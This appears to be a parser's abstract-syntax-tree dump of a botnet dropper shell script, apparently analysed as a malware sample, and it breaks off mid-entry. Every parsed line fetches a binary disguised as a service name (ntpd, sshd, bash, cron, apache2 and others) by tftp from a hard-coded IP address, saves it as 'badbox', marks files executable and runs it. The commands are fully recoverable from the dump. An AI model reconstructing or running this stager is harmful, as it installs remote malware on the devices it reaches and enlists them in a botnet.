CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 173), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 136), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 124), word='199.180.133.103'),
    WordNode(lineno=4, pos=(125, 127), word='-c'),
    WordNode(lineno=4, pos=(128, 131), word='get'),
    WordNode(lineno=4, pos=(132, 136), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(136, 137)),
  CommandNode(lineno=4, pos=(137, 153), parts=[
    WordNode(lineno=4, pos=(137, 140), word='cat'),
    WordNode(lineno=4, pos=(141, 145), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(147, 153), word='badbox'), pos=(146, 153), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(153, 154)),
  CommandNode(lineno=4, pos=(154, 164), parts=[
    WordNode(lineno=4, pos=(154, 159), word='chmod'),
    WordNode(lineno=4, pos=(160, 162), word='+x'),
    WordNode(lineno=4, pos=(163, 164), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(164, 165)),
  CommandNode(lineno=4, pos=(165, 173), parts=[
    WordNode(lineno=4, pos=(165, 173), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(174, 298), parts=[
  CommandNode(lineno=5, pos=(174, 181), parts=[
    WordNode(lineno=5, pos=(174, 176), word='cd'),
    WordNode(lineno=5, pos=(177, 181), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(182, 184)),
  CommandNode(lineno=5, pos=(185, 196), parts=[
    WordNode(lineno=5, pos=(185, 187), word='cd'),
    WordNode(lineno=5, pos=(188, 196), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(197, 199)),
  CommandNode(lineno=5, pos=(200, 207), parts=[
    WordNode(lineno=5, pos=(200, 202), word='cd'),
    WordNode(lineno=5, pos=(203, 207), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(208, 210)),
  CommandNode(lineno=5, pos=(211, 219), parts=[
    WordNode(lineno=5, pos=(211, 213), word='cd'),
    WordNode(lineno=5, pos=(214, 219), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(220, 222)),
  CommandNode(lineno=5, pos=(223, 227), parts=[
    WordNode(lineno=5, pos=(223, 225), word='cd'),
    WordNode(lineno=5, pos=(226, 227), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(227, 228)),
  CommandNode(lineno=5, pos=(229, 261), parts=[
    WordNode(lineno=5, pos=(229, 233), word='tftp'),
    WordNode(lineno=5, pos=(234, 249), word='199.180.133.103'),
    WordNode(lineno=5, pos=(250, 252), word='-c'),
    WordNode(lineno=5, pos=(253, 256), word='get'),
    WordNode(lineno=5, pos=(257, 261), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(261, 262)),
  CommandNode(lineno=5, pos=(262, 278), parts=[
    WordNode(lineno=5, pos=(262, 265), word='cat'),
    WordNode(lineno=5, pos=(266, 270), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(272, 278), word='badbox'), pos=(271, 278), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(278, 279)),
  CommandNode(lineno=5, pos=(279, 289), parts=[
    WordNode(lineno=5, pos=(279, 284), word='chmod'),
    WordNode(lineno=5, pos=(285, 287), word='+x'),
    WordNode(lineno=5, pos=(288, 289), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(289, 290)),
  CommandNode(lineno=5, pos=(290, 298), parts=[
    WordNode(lineno=5, pos=(290, 298), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(299, 429), parts=[
  CommandNode(lineno=6, pos=(299, 306), parts=[
    WordNode(lineno=6, pos=(299, 301), word='cd'),
    WordNode(lineno=6, pos=(302, 306), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(307, 309)),
  CommandNode(lineno=6, pos=(310, 321), parts=[
    WordNode(lineno=6, pos=(310, 312), word='cd'),
    WordNode(lineno=6, pos=(313, 321), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(322, 324)),
  CommandNode(lineno=6, pos=(325, 332), parts=[
    WordNode(lineno=6, pos=(325, 327), word='cd'),
    WordNode(lineno=6, pos=(328, 332), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(333, 335)),
  CommandNode(lineno=6, pos=(336, 344), parts=[
    WordNode(lineno=6, pos=(336, 338), word='cd'),
    WordNode(lineno=6, pos=(339, 344), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(345, 347)),
  CommandNode(lineno=6, pos=(348, 352), parts=[
    WordNode(lineno=6, pos=(348, 350), word='cd'),
    WordNode(lineno=6, pos=(351, 352), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(352, 353)),
  CommandNode(lineno=6, pos=(354, 389), parts=[
    WordNode(lineno=6, pos=(354, 358), word='tftp'),
    WordNode(lineno=6, pos=(359, 374), word='199.180.133.103'),
    WordNode(lineno=6, pos=(375, 377), word='-c'),
    WordNode(lineno=6, pos=(378, 381), word='get'),
    WordNode(lineno=6, pos=(382, 389), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(389, 390)),
  CommandNode(lineno=6, pos=(390, 409), parts=[
    WordNode(lineno=6, pos=(390, 393), word='cat'),
    WordNode(lineno=6, pos=(394, 401), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(403, 409), word='badbox'), pos=(402, 409), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(409, 410)),
  CommandNode(lineno=6, pos=(410, 420), parts=[
    WordNode(lineno=6, pos=(410, 415), word='chmod'),
    WordNode(lineno=6, pos=(416, 418), word='+x'),
    WordNode(lineno=6, pos=(419, 420), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(420, 421)),
  CommandNode(lineno=6, pos=(421, 429), parts=[
    WordNode(lineno=6, pos=(421, 429), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(430, 554), parts=[
  CommandNode(lineno=7, pos=(430, 437), parts=[
    WordNode(lineno=7, pos=(430, 432), word='cd'),
    WordNode(lineno=7, pos=(433, 437), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(438, 440)),
  CommandNode(lineno=7, pos=(441, 452), parts=[
    WordNode(lineno=7, pos=(441, 443), word='cd'),
    WordNode(lineno=7, pos=(444, 452), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(453, 455)),
  CommandNode(lineno=7, pos=(456, 463), parts=[
    WordNode(lineno=7, pos=(456, 458), word='cd'),
    WordNode(lineno=7, pos=(459, 463), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(464, 466)),
  CommandNode(lineno=7, pos=(467, 475), parts=[
    WordNode(lineno=7, pos=(467, 469), word='cd'),
    WordNode(lineno=7, pos=(470, 475), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(476, 478)),
  CommandNode(lineno=7, pos=(479, 483), parts=[
    WordNode(lineno=7, pos=(479, 481), word='cd'),
    WordNode(lineno=7, pos=(482, 483), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(483, 484)),
  CommandNode(lineno=7, pos=(485, 517), parts=[
    WordNode(lineno=7, pos=(485, 489), word='tftp'),
    WordNode(lineno=7, pos=(490, 505), word='199.180.133.103'),
    WordNode(lineno=7, pos=(506, 508), word='-c'),
    WordNode(lineno=7, pos=(509, 512), word='get'),
    WordNode(lineno=7, pos=(513, 517), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(517, 518)),
  CommandNode(lineno=7, pos=(518, 534), parts=[
    WordNode(lineno=7, pos=(518, 521), word='cat'),
    WordNode(lineno=7, pos=(522, 526), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(528, 534), word='badbox'), pos=(527, 534), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(534, 535)),
  CommandNode(lineno=7, pos=(535, 545), parts=[
    WordNode(lineno=7, pos=(535, 540), word='chmod'),
    WordNode(lineno=7, pos=(541, 543), word='+x'),
    WordNode(lineno=7, pos=(544, 545), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(545, 546)),
  CommandNode(lineno=7, pos=(546, 554), parts=[
    WordNode(lineno=7, pos=(546, 554), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(555, 679), parts=[
  CommandNode(lineno=8, pos=(555, 562), parts=[
    WordNode(lineno=8, pos=(555, 557), word='cd'),
    WordNode(lineno=8, pos=(558, 562), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(563, 565)),
  CommandNode(lineno=8, pos=(566, 577), parts=[
    WordNode(lineno=8, pos=(566, 568), word='cd'),
    WordNode(lineno=8, pos=(569, 577), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(578, 580)),
  CommandNode(lineno=8, pos=(581, 588), parts=[
    WordNode(lineno=8, pos=(581, 583), word='cd'),
    WordNode(lineno=8, pos=(584, 588), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(589, 591)),
  CommandNode(lineno=8, pos=(592, 600), parts=[
    WordNode(lineno=8, pos=(592, 594), word='cd'),
    WordNode(lineno=8, pos=(595, 600), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(601, 603)),
  CommandNode(lineno=8, pos=(604, 608), parts=[
    WordNode(lineno=8, pos=(604, 606), word='cd'),
    WordNode(lineno=8, pos=(607, 608), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(608, 609)),
  CommandNode(lineno=8, pos=(610, 642), parts=[
    WordNode(lineno=8, pos=(610, 614), word='tftp'),
    WordNode(lineno=8, pos=(615, 630), word='199.180.133.103'),
    WordNode(lineno=8, pos=(631, 633), word='-c'),
    WordNode(lineno=8, pos=(634, 637), word='get'),
    WordNode(lineno=8, pos=(638, 642), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(642, 643)),
  CommandNode(lineno=8, pos=(643, 659), parts=[
    WordNode(lineno=8, pos=(643, 646), word='cat'),
    WordNode(lineno=8, pos=(647, 651), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(653, 659), word='badbox'), pos=(652, 659), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(659, 660)),
  CommandNode(lineno=8, pos=(660, 670), parts=[
    WordNode(lineno=8, pos=(660, 665), word='chmod'),
    WordNode(lineno=8, pos=(666, 668), word='+x'),
    WordNode(lineno=8, pos=(669, 670), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(670, 671)),
  CommandNode(lineno=8, pos=(671, 679), parts=[
    WordNode(lineno=8, pos=(671, 679), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(680, 804), parts=[
  CommandNode(lineno=9, pos=(680, 687), parts=[
    WordNode(lineno=9, pos=(680, 682), word='cd'),
    WordNode(lineno=9, pos=(683, 687), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(688, 690)),
  CommandNode(lineno=9, pos=(691, 702), parts=[
    WordNode(lineno=9, pos=(691, 693), word='cd'),
    WordNode(lineno=9, pos=(694, 702), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(703, 705)),
  CommandNode(lineno=9, pos=(706, 713), parts=[
    WordNode(lineno=9, pos=(706, 708), word='cd'),
    WordNode(lineno=9, pos=(709, 713), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(714, 716)),
  CommandNode(lineno=9, pos=(717, 725), parts=[
    WordNode(lineno=9, pos=(717, 719), word='cd'),
    WordNode(lineno=9, pos=(720, 725), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(726, 728)),
  CommandNode(lineno=9, pos=(729, 733), parts=[
    WordNode(lineno=9, pos=(729, 731), word='cd'),
    WordNode(lineno=9, pos=(732, 733), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(733, 734)),
  CommandNode(lineno=9, pos=(735, 767), parts=[
    WordNode(lineno=9, pos=(735, 739), word='tftp'),
    WordNode(lineno=9, pos=(740, 755), word='199.180.133.103'),
    WordNode(lineno=9, pos=(756, 758), word='-c'),
    WordNode(lineno=9, pos=(759, 762), word='get'),
    WordNode(lineno=9, pos=(763, 767), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(767, 768)),
  CommandNode(lineno=9, pos=(768, 784), parts=[
    WordNode(lineno=9, pos=(768, 771), word='cat'),
    WordNode(lineno=9, pos=(772, 776), word='wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(778, 784), word='badbox'), pos=(777, 784), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(784, 785)),
  CommandNode(lineno=9, pos=(785, 795), parts=[
    WordNode(lineno=9, pos=(785, 790), word='chmod'),
    WordNode(lineno=9, pos=(791, 793), word='+x'),
    WordNode(lineno=9, pos=(794, 795), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(795, 796)),
  CommandNode(lineno=9, pos=(796, 804), parts=[
    WordNode(lineno=9, pos=(796, 804), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(805, 929), parts=[
  CommandNode(lineno=10, pos=(805, 812), parts=[
    WordNode(lineno=10, pos=(805, 807), word='cd'),
    WordNode(lineno=10, pos=(808, 812), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(813, 815)),
  CommandNode(lineno=10, pos=(816, 827), parts=[
    WordNode(lineno=10, pos=(816, 818), word='cd'),
    WordNode(lineno=10, pos=(819, 827), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(828, 830)),
  CommandNode(lineno=10, pos=(831, 838), parts=[
    WordNode(lineno=10, pos=(831, 833), word='cd'),
    WordNode(lineno=10, pos=(834, 838), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(839, 841)),
  CommandNode(lineno=10, pos=(842, 850), parts=[
    WordNode(lineno=10, pos=(842, 844), word='cd'),
    WordNode(lineno=10, pos=(845, 850), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(851, 853)),
  CommandNode(lineno=10, pos=(854, 858), parts=[
    WordNode(lineno=10, pos=(854, 856), word='cd'),
    WordNode(lineno=10, pos=(857, 858), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(858, 859)),
  CommandNode(lineno=10, pos=(860, 892), parts=[
    WordNode(lineno=10, pos=(860, 864), word='tftp'),
    WordNode(lineno=10, pos=(865, 880), word='199.180.133.103'),
    WordNode(lineno=10, pos=(881, 883), word='-c'),
    WordNode(lineno=10, pos=(884, 887), word='get'),
    WordNode(lineno=10, pos=(888, 892), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(892, 893)),
  CommandNode(lineno=10, pos=(893, 909), parts=[
    WordNode(lineno=10, pos=(893, 896), word='cat'),
    WordNode(lineno=10, pos=(897, 901), word='cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(903, 909), word='badbox'), pos=(902, 909), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(909, 910)),
  CommandNode(lineno=10, pos=(910, 920), parts=[
    WordNode(lineno=10, pos=(910, 915), word='chmod'),
    WordNode(lineno=10, pos=(916, 918), word='+x'),
    WordNode(lineno=10, pos=(919, 920), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(920, 921)),
  CommandNode(lineno=10, pos=(921, 929), parts=[
    WordNode(lineno=10, pos=(921, 929), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(930, 1052), parts=[
  CommandNode(lineno=11, pos=(930, 937), parts=[
    WordNode(lineno=11, pos=(930, 932), word='cd'),
    WordNode(lineno=11, pos=(933, 937), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(938, 940)),
  CommandNode(lineno=11, pos=(941, 952), parts=[
    WordNode(lineno=11, pos=(941, 943), word='cd'),
    WordNode(lineno=11, pos=(944, 952), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(953, 955)),
  CommandNode(lineno=11, pos=(956, 963), parts=[
    WordNode(lineno=11, pos=(956, 958), word='cd'),
    WordNode(lineno=11, pos=(959, 963), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(964, 966)),
  CommandNode(lineno=11, pos=(967, 975), parts=[
    WordNode(lineno=11, pos=(967, 969), word='cd'),
    WordNode(lineno=11, pos=(970, 975), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(976, 978)),
  CommandNode(lineno=11, pos=(979, 983), parts=[
    WordNode(lineno=11, pos=(979, 981), word='cd'),
    WordNode(lineno=11, pos=(982, 983), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(983, 984)),
  CommandNode(lineno=11, pos=(985, 1016), parts=[
    WordNode(lineno=11, pos=(985, 989), word='tftp'),
    WordNode(lineno=11, pos=(990, 1005), word='199.180.133.103'),
    WordNode(lineno=11, pos=(1006, 1008), word='-c'),
    WordNode(lineno=11, pos=(1009, 1012), word='get'),
    WordNode(lineno=11, pos=(1013, 1016), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1016, 1017)),
  CommandNode(lineno=11, pos=(1017, 1032), parts=[
    WordNode(lineno=11, pos=(1017, 1020), word='cat'),
    WordNode(lineno=11, pos=(1021, 1024), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1026, 1032), word='badbox'), pos=(1025, 1032), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1032, 1033)),
  CommandNode(lineno=11, pos=(1033, 1043), parts=[
    WordNode(lineno=11, pos=(1033, 1038), word='chmod'),
    WordNode(lineno=11, pos=(1039, 1041), word='+x'),
    WordNode(lineno=11, pos=(1042, 1043), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1043, 1044)),
  CommandNode(lineno=11, pos=(1044, 1052), parts=[
    WordNode(lineno=11, pos=(1044, 1052), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1053, 1177), parts=[
  CommandNode(lineno=12, pos=(1053, 1060), parts=[
    WordNode(lineno=12, pos=(1053, 1055), word='cd'),
    WordNode(lineno=12, pos=(1056, 1060), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1061, 1063)),
  CommandNode(lineno=12, pos=(1064, 1075), parts=[
    WordNode(lineno=12, pos=(1064, 1066), word='cd'),
    WordNode(lineno=12, pos=(1067, 1075), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1076, 1078)),
  CommandNode(lineno=12, pos=(1079, 1086), parts=[
    WordNode(lineno=12, pos=(1079, 1081), word='cd'),
    WordNode(lineno=12, pos=(1082, 1086), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1087, 1089)),
  CommandNode(lineno=12, pos=(1090, 1098), parts=[
    WordNode(lineno=12, pos=(1090, 1092), word='cd'),
    WordNode(lineno=12, pos=(1093, 1098), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1099, 1101)),
  CommandNode(lineno=12, pos=(1102, 1106), parts=[
    WordNode(lineno=12, pos=(1102, 1104), word='cd'),
    WordNode(lineno=12, pos=(1105, 1106), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1106, 1107)),
  CommandNode(lineno=12, pos=(1108, 1140), parts=[
    WordNode(lineno=12, pos=(1108, 1112), word='tftp'),
    WordNode(lineno=12, pos=(1113, 1128), word='199.180.133.103'),
    WordNode(lineno=12, pos=(1129, 1131), word='-c'),
    WordNode(lineno=12, pos=(1132, 1135), word='get'),
    WordNode(lineno=12, pos=(1136, 1140), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1140, 1141)),
  CommandNode(lineno=12, pos=(1141, 1157), parts=[
    WordNode(lineno=12, pos=(1141, 1144), word='cat'),
    WordNode(lineno=12, pos=(1145, 1149), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1151, 1157), word='badbox'), pos=(1150, 1157), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1157, 1158)),
  CommandNode(lineno=12, pos=(1158, 1168), parts=[
    WordNode(lineno=12, pos=(1158, 1163), word='chmod'),
    WordNode(lineno=12, pos=(1164, 1166), word='+x'),
    WordNode(lineno=12, pos=(1167, 1168), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1168, 1169)),
  CommandNode(lineno=12, pos=(1169, 1177), parts=[
    WordNode(lineno=12, pos=(1169, 1177), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1178, 1298), parts=[
  CommandNode(lineno=13, pos=(1178, 1185), parts=[
    WordNode(lineno=13, pos=(1178, 1180), word='cd'),
    WordNode(lineno=13, pos=(1181, 1185), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1186, 1188)),
  CommandNode(lineno=13, pos=(1189, 1200), parts=[
    WordNode(lineno=13, pos=(1189, 1191), word='cd'),
    WordNode(lineno=13, pos=(1192, 1200), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1201, 1203)),
  CommandNode(lineno=13, pos=(1204, 1211), parts=[
    WordNode(lineno=13, pos=(1204, 1206), word='cd'),
    WordNode(lineno=13, pos=(1207, 1211), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1212, 1214)),
  CommandNode(lineno=13, pos=(1215, 1223), parts=[
    WordNode(lineno=13, pos=(1215, 1217), word='cd'),
    WordNode(lineno=13, pos=(1218, 1223), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1224, 1226)),
  CommandNode(lineno=13, pos=(1227, 1231), parts=[
    WordNode(lineno=13, pos=(1227, 1229), word='cd'),
    WordNode(lineno=13, pos=(1230, 1231), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1231, 1232)),
  CommandNode(lineno=13, pos=(1233, 1263), parts=[
    WordNode(lineno=13, pos=(1233, 1237), word='tftp'),
    WordNode(lineno=13, pos=(1238, 1253), word='199.180.133.103'),
    WordNode(lineno=13, pos=(1254, 1256), word='-c'),
    WordNode(lineno=13, pos=(1257, 1260), word='get'),
    WordNode(lineno=13, pos=(1261, 1263), word='sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1263, 1264)),
  CommandNode(lineno=13, pos=(1264, 1278), parts=[
    WordNode(lineno=13, pos=(1264, 1267), word='cat'),
    WordNode(lineno=13, pos=(1268, 1270), word='sh'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1272, 1278), word='badbox'), pos=(1271, 1278), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1278, 1279)),
  CommandNode(lineno=13, pos=(1279, 1289), parts=[
    WordNode(lineno=13, pos=(1279, 1284), word='chmod'),
    WordNode(lineno=13, pos=(1285, 1287), word='+x'),
    WordNode(lineno=13, pos=(1288, 1289), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1289, 1290)),
  CommandNode(lineno=13, pos=(1290, 1298), parts=[
    WordNode(lineno=13, pos=(1290, 1298), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1299, 1421), parts=[
  CommandNode(lineno=14, pos=(1299, 1306), parts=[
    WordNode(lineno=14, pos=(1299, 1301), word='cd'),
    WordNode(lineno=14, pos=(1302, 1306), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1307, 1309)),
  CommandNode(lineno=14, pos=(1310, 1321), parts=[
    WordNode(lineno=14, pos=(1310, 1312), word='cd'),
    WordNode(lineno=14, pos=(1313, 1321), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1322, 1324)),
  CommandNode(lineno=14, pos=(1325, 1332), parts=[
    WordNode(lineno=14, pos=(1325, 1327), word='cd'),
    WordNode(lineno=14, pos=(1328, 1332), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1333, 1335)),
  CommandNode(lineno=14, pos=(1336, 1344), parts=[
    WordNode(lineno=14, pos=(1336, 1338), word='cd'),
    WordNode(lineno=14, pos=(1339, 1344), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1345, 1347)),
  CommandNode(lineno=14, pos=(1348, 1352), parts=[
    WordNode(lineno=14, pos=(1348, 1350), word='cd'),
    WordNode(lineno=14, pos=(1351, 1352), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1352, 1353)),
  CommandNode(lineno=14, pos=(1354, 1385), parts=[
    WordNode(lineno=14, pos=(1354, 1358), word='tftp'),
    WordNode(lineno=14, pos=(1359, 1374), word='199.180.133.103'),
    WordNode(lineno=14, pos=(1375, 1377), word='-c'),
    WordNode(lineno=14, pos=(1378, 1381), word='get'),
    WordNode(lineno=14, pos=(1382, 1385), word=' '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1385, 1386)),
  CommandNode(lineno=14, pos=(1386, 1401), parts=[
    WordNode(lineno=14, pos=(1386, 1389), word='cat'),
    WordNode(lineno=14, pos=(1390, 1393), word=' '),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1395, 1401), word='badbox'), pos=(1394, 1401), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1401, 1402)),
  CommandNode(lineno=14, pos=(1402, 1412), parts=[
    WordNode(lineno=14, pos=(1402, 1407), word='chmod'),
    WordNode(lineno=14, pos=(1408, 1410), word='+x'),
    WordNode(lineno=14, pos=(1411, 1412), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1412, 1413)),
  CommandNode(lineno=14, pos=(1413, 1421), parts=[
    WordNode(lineno=14, pos=(1413, 1421), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1422, 1552), parts=[
  CommandNode(lineno=15, pos=(1422, 1429), parts=[
    WordNode(lineno=15, pos=(1422, 1424), word='cd'),
    WordNode(lineno=15, pos=(1425, 1429), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1430, 1432)),
  CommandNode(lineno=15, pos=(1433, 1444), parts=[
    WordNode(lineno=15, pos=(1433, 1435), word='cd'),
    WordNode(lineno=15, pos=(1436, 1444), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1445, 1447)),
  CommandNode(lineno=15, pos=(1448, 1455), parts=[
    WordNode(lineno=15, pos=(1448, 1450), word='cd'),
    WordNode(lineno=15, pos=(1451, 1455), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1456, 1458)),
  CommandNode(lineno=15, pos=(1459, 1467), parts=[
    WordNode(lineno=15, pos=(1459, 1461), word='cd'),
    WordNode(lineno=15, pos=(1462, 1467), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1468, 1470)),
  CommandNode(lineno=15, pos=(1471, 1475), parts=[
    WordNode(lineno=15, pos=(1471, 1473), word='cd'),
    WordNode(lineno=15, pos=(1474, 1475), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1475, 1476)),
  CommandNode(lineno=15, pos=(1477, 1512), parts=[
    WordNode(lineno=15, pos=(1477, 1481), word='tftp'),
    WordNode(lineno=15, pos=(1482, 1497), word='199.180.133.103'),
    WordNode(lineno=15, pos=(1498, 1500), word='-c'),
    WordNode(lineno=15, pos=(1501, 1504), word='get'),
    WordNode(lineno=15, pos=(1505, 1512), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1512, 1513)),
  CommandNode(lineno=15, pos=(1513, 1532), parts=[
    WordNode(lineno=15, pos=(1513, 1516), word='cat'),
    WordNode(lineno=15, pos=(1517, 1524), word='apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1526, 1532), word='badbox'), pos=(1525, 1532), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1532, 1533)),
  CommandNode(lineno=15, pos=(1533, 1543), parts=[
    WordNode(lineno=15, pos=(1533, 1538), word='chmod'),
    WordNode(lineno=15, pos=(1539, 1541), word='+x'),
    WordNode(lineno=15, pos=(1542, 1543), word='*'),
  ]),
